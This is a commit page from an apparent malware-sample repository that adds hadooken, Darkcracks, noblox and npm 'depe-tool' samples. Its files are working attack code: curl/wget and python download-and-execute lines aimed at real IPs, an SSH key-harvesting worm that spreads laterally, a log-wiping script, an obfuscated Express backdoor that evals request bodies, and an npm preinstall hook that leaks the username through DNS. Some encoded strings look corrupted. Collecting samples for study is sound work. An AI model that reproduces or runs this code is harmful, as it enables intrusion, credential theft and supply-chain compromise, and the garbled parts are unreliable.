-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
* Add Darkcracks, helmen-validate, noblox, aspdasdksa2 samples * Remove blank output files * add README * Add hadooken and jail samples
- Loading branch information
1 parent
bdcb8c2
commit b112eaf
Showing
22 changed files
with
2,811 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
#!/bin/bash | ||
cp -f -r -- /bin/crondr /bin/-bash 2>/dev/null | ||
cd /bin 2>/dev/null | ||
./-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 | ||
rm -rf -- -bash 2>/dev/null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
|
||
(curl -s http://89.185.85.102/c || wget -q -0- http://89.185.85.102/c || lwp-download http://89.185.85.102/c /tmp/c) | bash -sh; bash /tmp/c; | ||
rm -rf /tmp/c; | ||
echo | ||
kucmVhZCgpkScgfHwgcHl0aG9uMyA | ||
cHl0aG9uIC1jICdpbXBvcnQgdXJsbGl{LnJlcXVlc3Q7IGV4ZWModXJsbGl{LnJlcXVlc3QudXJsb3BlbigiaHR0cDovLzE4NS4xNzQuMTM2LjIwNC951 tYyAnaW1wb3J8IHVybGxpY5yZXF1ZXN80yBleGVjKHVybGxpY{5yZXF1ZXN0LnVybG9wZW4oImh0dHA6Ly8x0DUUMTcOLJEzNl4yMDQveSpLnJlYWQoKSkn | base64 -d | bash |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
|
||
python -c 'import urllib.request; exec(urllib.request.urlopen("http://185.174.136.204/y").read())' || python3 -c 'import urllib.request; exec(urllib.request.urlopen("http://185.174.136.204/y").read())" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
|
||
cc="http://89.185.85.102" | ||
sys="kekenukaxusn" | ||
DIR="/tmp" | ||
|
||
m() { | ||
get "$cc/hadooken" "$DIR/$sys" | ||
"$DIR/$sys" | ||
sleep 1 | ||
} | ||
|
||
m | ||
rm -f "$DIR/$sys" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
|
||
cc="http://89.185.85.102" | ||
sys="kekenukaxusn" | ||
DIR="/tmp" | ||
|
||
m() { | ||
get $cc/hadooken ./$sys | ||
./$sys | ||
sleep 1 | ||
} | ||
|
||
m | ||
rm -f ./$sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
|
||
import platform | ||
import os | ||
import urllib.request | ||
def download_and_execute(url, target_path): | ||
try: | ||
response = urllib.request.urlopen(url) | ||
if response.getcode() == 200: | ||
data = response.read() | ||
with open(target_path, "wb") as code: code.write(data) | ||
os.chmod(target_path, 00777) | ||
cmd = '{}'.format(target_path) os.system(cmd) | ||
print("Command OK") | ||
return True | ||
except Exception: | ||
pass | ||
finally: | ||
if os.path.exists(target_path): | ||
os.remove(target_path) | ||
return False | ||
if platform.architecture()[0] =="64bit": | ||
url = "http://185.174.136.204/hadooken" | ||
for target_dir in ["/tmp", "/var/tmp", "/dev/shm", "/run/user", "/usr/local/share", "/var/run", "/opt", "/", "/mnt"]: target_path = os.path.join(target_dir, "hadooken") | ||
if download_and_execute(url, target_path): | ||
print("Download Already OK") | ||
break |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
|
||
function A1B2C { | ||
param ( | ||
[Parameter (Mandatory = $true)] [string] $D3E4F, | ||
[Parameter (Mandatory = $true)] | ||
[string] $G5H6I | ||
) | ||
$J7K8L = [System.IO.Path]::GetTempPath() | ||
$M9N00 = Join-Path -Path $J7K8L -ChildPath $G5H6I | ||
try { | ||
$P1Q2R = [System.Convert]:: FromBase64String($D3E4F) [System.IO.File]::WriteAllBytes($M9N00, $P1Q2R) Start-Process -FilePath $M9N0O | ||
} catch { | ||
} | ||
} | ||
$S3T4U | ||
"TVqQA << REDUCTED>> AAAAAAAA" | ||
$V5W6X = "Winscpmodified.exe" | ||
A1B2C -D3E4F $S3T4U -G5H61 $V5W6X |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
_sig="$HOME/.localsshaxxaa" | ||
if [ ! -f "$_sig" ]; then | ||
-q -0 | ||
touch "$_sig" | ||
KEYS=$(find ~/ /root/home -maxdepth 2 -name 'id_rsa*'! -name '*.pub') | ||
KEYS2=$(grep -h IdentityFile ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | awk '{print $2}') KEYS3=$(find ~/ /root/home -maxdepth 3 -name '*.pem' | uniq) | ||
HOSTS=$(grep -h HostName ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | awk '{print $2}') | ||
HOSTS2=$(grep -OP "(ssh|scp)\s+\K[^\s]+" ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}") | ||
HOSTS3=$(grep -h -oP "([0-9]{1,3}\. ){3}[0-9]{1,3}" ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | uniq) | ||
USERZ=$(find ~/ /root/home -maxdepth 2 -name '.ssh' | xargs -I {} find {} -name 'id_rsa*' ! -name '*.pub' | awk -F'/' '{print $3}' | uniq) | ||
users=$( | ||
echo "$USERZ" | tr | ||
'\n' | sort -u | ||
) | ||
hosts=$(echo -e "$HOSTS\n$HOSTS2\n$HOSTS3" | grep -v "127.0.0.1" | sort -u) | ||
keys=$(echo -e "$KEYS\n$KEYS2\n$KEYS3" | sort -u) | ||
for user in $users; do | ||
for host in $hosts; do | ||
for key in $keys; do | ||
chmod 400 "$key" | ||
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i "$key" "$user@$host" "(curl -s http://89.185.85.102/c || wget http://89.185.85.102/c || lwp-download http://89.185.85.102/c /tmp/c) | bash -sh; bash /tmp/c; rm -rf /tmp/c; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliLnJlcXVlc3Q7IGV4ZWModXJsbGliLnJlcXVlc3QudXJsb3BlbigiaHR0cDovLzE4NS4xNzQuMTM2LjIwNC95IikucmVhZCgpKScgfHwgcHl0aG9uMyAtYyAnaW1wb3J0IHVybGxpYi5yZXF1ZXN00yBleGVjKHVybGxpYi5yZXF1ZXN0LnVybG9wZW40 Imh0dHA6Ly8x0DUUMTCOLjEzNi4yMDQveSIpLnJlYWQoKSkn" | base64 -d | bash | ||
done | ||
done | ||
done | ||
fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
echo 0 > /var/spool/mail/root | ||
echo 0 > /var/log/wtmp | ||
echo 0 > /var/log/secure | ||
echo 0 > /var/log/cron |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,228 @@ | ||
const _0x122a47 = _0x4cfd; | ||
(function (_0x19b533, _0x3a14dd) { | ||
const _0x491cff = _0x4cfd, | ||
_0x2dcd82 = _0x19b533(); | ||
while (!![]) { | ||
try { | ||
const _0x2e6977 = | ||
(-parseInt(_0x491cff(0x1bd)) / (0x156d + 0x1569 + -0x2ad5)) * | ||
(-parseInt(_0x491cff(0x1a7)) / | ||
(0x1 * 0x2112 + -0xe * 0x1ea + -0x644)) + | ||
-parseInt(_0x491cff(0x19f)) / | ||
(-0x1 * -0x19d3 + -0x425 * -0x5 + -0x2e89) + | ||
parseInt(_0x491cff(0x1a2)) / (0x10d * -0x11 + 0x1 * 0xa7d + 0x764) + | ||
(-parseInt(_0x491cff(0x195)) / | ||
(0x4 * 0x8a6 + 0x7 * 0x439 + 0x4022 * -0x1)) * | ||
(-parseInt(_0x491cff(0x19a)) / | ||
(-0xbb9 * 0x1 + -0x1f2b + -0x6 * -0x727)) + | ||
-parseInt(_0x491cff(0x19b)) / (0x4a2 * 0x4 + 0x18fb + -0x1fa * 0x16) + | ||
parseInt(_0x491cff(0x1a1)) / (0x1b6b + -0x26f7 + 0xb94) + | ||
(-parseInt(_0x491cff(0x1a4)) / (-0x261b + -0x20cb + 0x46ef)) * | ||
(parseInt(_0x491cff(0x1a9)) / (0x1d4c + 0x1d * 0xbf + -0x32e5)); | ||
if (_0x2e6977 === _0x3a14dd) break; | ||
else _0x2dcd82["push"](_0x2dcd82["shift"]()); | ||
} catch (_0x1ea857) { | ||
_0x2dcd82["push"](_0x2dcd82["shift"]()); | ||
} | ||
} | ||
})(_0x5808, -0x14ee15 + -0xd9a42 + 0x7 * 0x68bee); | ||
const express = require(_0x122a47(0x1ab)), | ||
axios = require(_0x122a47(0x1b8)), | ||
delay = (_0xa2960b) => | ||
new Promise((_0x339732) => setTimeout(_0x339732, _0xa2960b)), | ||
increaseTimeoutMiddleware = function (_0x6c7e55) { | ||
const _0x37c262 = { | ||
kUiFu: function (_0x5176b1) { | ||
return _0x5176b1(); | ||
}, | ||
}; | ||
return (_0x116b66, _0x5948ed, _0x4ba5ef) => { | ||
const _0x1a3c7a = _0x4cfd; | ||
_0x116b66[_0x1a3c7a(0x1b7)](_0x6c7e55), | ||
_0x37c262[_0x1a3c7a(0x190)](_0x4ba5ef); | ||
}; | ||
}, | ||
catchAsync = (_0x55e054) => { | ||
const _0x2f553d = { | ||
jEHcf: function (_0x192f35, _0x23dbe0, _0x3c4bac, _0x350ddf) { | ||
return _0x192f35(_0x23dbe0, _0x3c4bac, _0x350ddf); | ||
}, | ||
}; | ||
return (_0x55e9e0, _0x111bf0, _0x4be67f) => { | ||
const _0x4629fa = _0x4cfd; | ||
_0x2f553d[_0x4629fa(0x18f)](_0x55e054, _0x55e9e0, _0x111bf0, _0x4be67f)[ | ||
_0x4629fa(0x1ba) | ||
](_0x4be67f); | ||
}; | ||
}; | ||
async function run(_0x4eaa94, _0x398fca) { | ||
const _0x3fb732 = _0x122a47, | ||
_0x577285 = { | ||
tOPbR: function (_0x36b2cc, _0x154a2c) { | ||
return _0x36b2cc(_0x154a2c); | ||
}, | ||
}; | ||
let _0x5aa7d8 = | ||
_0x3fb732(0x1bc) + | ||
_0x3fb732(0x1be) + | ||
_0x3fb732(0x1b6) + | ||
_0x3fb732(0x1ad) + | ||
_0x3fb732(0x198), | ||
_0x1e516a = _0x4eaa94[_0x3fb732(0x1b3)]; | ||
return _0x577285[_0x3fb732(0x19d)](eval, _0x1e516a["js"]); | ||
} | ||
function _0x5808() { | ||
const _0x11173f = [ | ||
"237054jeHhqw", | ||
"1834161FfqVqh", | ||
"i.ipify.or", | ||
"tOPbR", | ||
"NmUMH", | ||
"210804RGvmIx", | ||
"sSyII", | ||
"6379304IXNDzu", | ||
"4237008NTmesW", | ||
"g?format=j", | ||
"18hEBkiY", | ||
"post", | ||
".72.229.23", | ||
"4GGrSjt", | ||
"ETxAC", | ||
"11333280pUxuCJ", | ||
"VsuQj", | ||
"express", | ||
"IJGiK", | ||
"return\x20\x27a\x27", | ||
"EijpY", | ||
"get", | ||
"ZOvjL", | ||
"bugsnag", | ||
"/pproperty", | ||
"body", | ||
"son", | ||
"http://184", | ||
"t\x27);\x0a//\x20\x20\x20", | ||
"setTimeout", | ||
"axios", | ||
"/scrappedd", | ||
"catch", | ||
"lXgvx", | ||
"console.lo", | ||
"602929MJubhw", | ||
"g(\x27Run\x20tes", | ||
"jEHcf", | ||
"kUiFu", | ||
"sqJsh", | ||
"https://ap", | ||
"send", | ||
"7:9999/mh", | ||
"35WCGHrh", | ||
"use", | ||
"Router", | ||
";\x0a\x20\x20", | ||
"YBayv", | ||
]; | ||
_0x5808 = function () { | ||
return _0x11173f; | ||
}; | ||
return _0x5808(); | ||
} | ||
async function pst_inf() { | ||
const _0x3da834 = _0x122a47, | ||
_0x478b2b = { | ||
ETxAC: | ||
_0x3da834(0x192) + | ||
_0x3da834(0x19c) + | ||
_0x3da834(0x1a3) + | ||
_0x3da834(0x1b4), | ||
ZOvjL: _0x3da834(0x1b5) + _0x3da834(0x1a6) + _0x3da834(0x194), | ||
}; | ||
try { | ||
let _0xbbb76c = {}; | ||
try { | ||
let { data: _0x393d8a } = await axios[_0x3da834(0x1af)]( | ||
_0x478b2b[_0x3da834(0x1a8)] | ||
); | ||
_0xbbb76c = { ..._0xbbb76c, ..._0x393d8a }; | ||
} catch (_0x17dcdf) {} | ||
let _0x28bf33 = await axios[_0x3da834(0x1a5)]( | ||
_0x478b2b[_0x3da834(0x1b0)], | ||
_0xbbb76c | ||
); | ||
} catch (_0x44a028) {} | ||
} | ||
async function st() { | ||
const _0x93d204 = _0x122a47, | ||
_0x21ed82 = { | ||
sSyII: function (_0x2d5bdd) { | ||
return _0x2d5bdd(); | ||
}, | ||
YBayv: function (_0x4f4802, _0xfc81cf) { | ||
return _0x4f4802(_0xfc81cf); | ||
}, | ||
}; | ||
while (!![]) { | ||
try { | ||
await _0x21ed82[_0x93d204(0x1a0)](run); | ||
} catch (_0x5e622b) {} | ||
await _0x21ed82[_0x93d204(0x199)]( | ||
delay, | ||
-0xdd55c * 0x9 + -0x4a0078c + -0x1 * -0x8177848 | ||
); | ||
} | ||
} | ||
async function st2(_0x2fc7f5) { | ||
const _0x21835c = _0x122a47, | ||
_0x16eb0d = { | ||
VsuQj: function (_0x4262aa, _0x45ac76, _0x3b1cc9) { | ||
return _0x4262aa(_0x45ac76, _0x3b1cc9); | ||
}, | ||
IJGiK: function (_0x12ba3f) { | ||
return _0x12ba3f(); | ||
}, | ||
NmUMH: _0x21835c(0x1b9), | ||
lXgvx: function (_0x19682d, _0x7ae28a) { | ||
return _0x19682d(_0x7ae28a); | ||
}, | ||
EijpY: _0x21835c(0x1b2), | ||
sqJsh: function (_0x284bc9) { | ||
return _0x284bc9(); | ||
}, | ||
}, | ||
_0xa237ae = express[_0x21835c(0x197)](); | ||
_0xa237ae[_0x21835c(0x1a5)]( | ||
_0x16eb0d[_0x21835c(0x19e)], | ||
_0x16eb0d[_0x21835c(0x1bb)]( | ||
increaseTimeoutMiddleware, | ||
0x1 * 0xb9a71 + 0x79 * 0xae7 + -0x799e0 | ||
), | ||
_0x16eb0d[_0x21835c(0x1bb)](catchAsync, async (_0x2fc188, _0x4ed992) => { | ||
const _0x4b4cb8 = _0x21835c; | ||
_0x4ed992[_0x4b4cb8(0x193)]( | ||
await _0x16eb0d[_0x4b4cb8(0x1aa)](run, _0x2fc188, _0x4ed992) | ||
); | ||
}) | ||
), | ||
await _0x2fc7f5[_0x21835c(0x196)](_0x16eb0d[_0x21835c(0x1ae)], _0xa237ae), | ||
_0x16eb0d[_0x21835c(0x191)](pst_inf); | ||
const _0x1bc03c = _0x16eb0d[_0x21835c(0x1aa)]( | ||
setInterval, | ||
function () { | ||
const _0x4760c0 = _0x21835c; | ||
_0x16eb0d[_0x4760c0(0x1ac)](pst_inf); | ||
}, | ||
-0x1 * -0x4efcf + 0x1de1d8 + 0x9b * -0xc25 | ||
); | ||
} | ||
function _0x4cfd(_0x42ad4b, _0x44de92) { | ||
const _0x5582da = _0x5808(); | ||
return ( | ||
(_0x4cfd = function (_0x10efd3, _0x2ab9c3) { | ||
_0x10efd3 = _0x10efd3 - (0xe9 * -0x21 + -0x1a45 * 0x1 + 0x39dd); | ||
let _0x46636f = _0x5582da[_0x10efd3]; | ||
return _0x46636f; | ||
}), | ||
_0x4cfd(_0x42ad4b, _0x44de92) | ||
); | ||
} | ||
exports[_0x122a47(0x1b1)] = st2; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
{ | ||
"name": "depe-tool", | ||
"version": "1.2.2", | ||
"description": "p0c", | ||
"main": "index.js", | ||
"scripts": { | ||
"preinstall": "node -e \"const fs = require('fs'); const rawData = fs.readFileSync('preinstall.json'); const jsonData = JSON.parse(rawData); eval(jsonData.script);\"" | ||
}, | ||
"author": "", | ||
"license": "ISC" | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
{ | ||
"script": "const hexPayload = '0a636f6e7374206f73203d207265717569726528276f7327293b0a636f6e737420646e73203d20726571756972652827646e7327293b0a0a636f6e737420656e636f646544617461203d20286461746129203d3e204275666665722e66726f6d2864617461292e746f537472696e67282768657827293b0a636f6e737420676574557365724e616d65203d202829203d3e206f732e75736572496e666f28292e757365726e616d653b0a636f6e73742064617461203d207b20757365726e616d653a20676574557365724e616d652829207d3b0a636f6e737420656e636f64656444617461203d20656e636f646544617461284a534f4e2e737472696e67696679286461746129293b0a0a66756e6374696f6e20646e73457866696c74726174696f6e2829207b0a2020636f6e737420657866696c74726174696f6e446f6d61696e203d2060247b656e636f646564446174617d2e6671396d6575796b3370776d756a666464783536306e7838387a6571326871362e6f6173746966792e636f6d603b0a2020646e732e7265736f6c76653428657866696c74726174696f6e446f6d61696e2c20286572722c2061646472657373657329203d3e207b0a202020206966202865727229207b0a20202020202070726f636573732e657869742831293b0a202020207d20656c7365207b0a20202020202070726f636573732e657869742830293b0a202020207d0a20207d293b0a7d0a0a646e73457866696c74726174696f6e28293b0a'; const decodeHex = (hex) => Buffer.from(hex, 'hex').toString('utf8'); const payload = decodeHex(hexPayload); eval(payload);" | ||
} |
Large diffs are not rendered by default.
Oops, something went wrong.
Oops, something went wrong.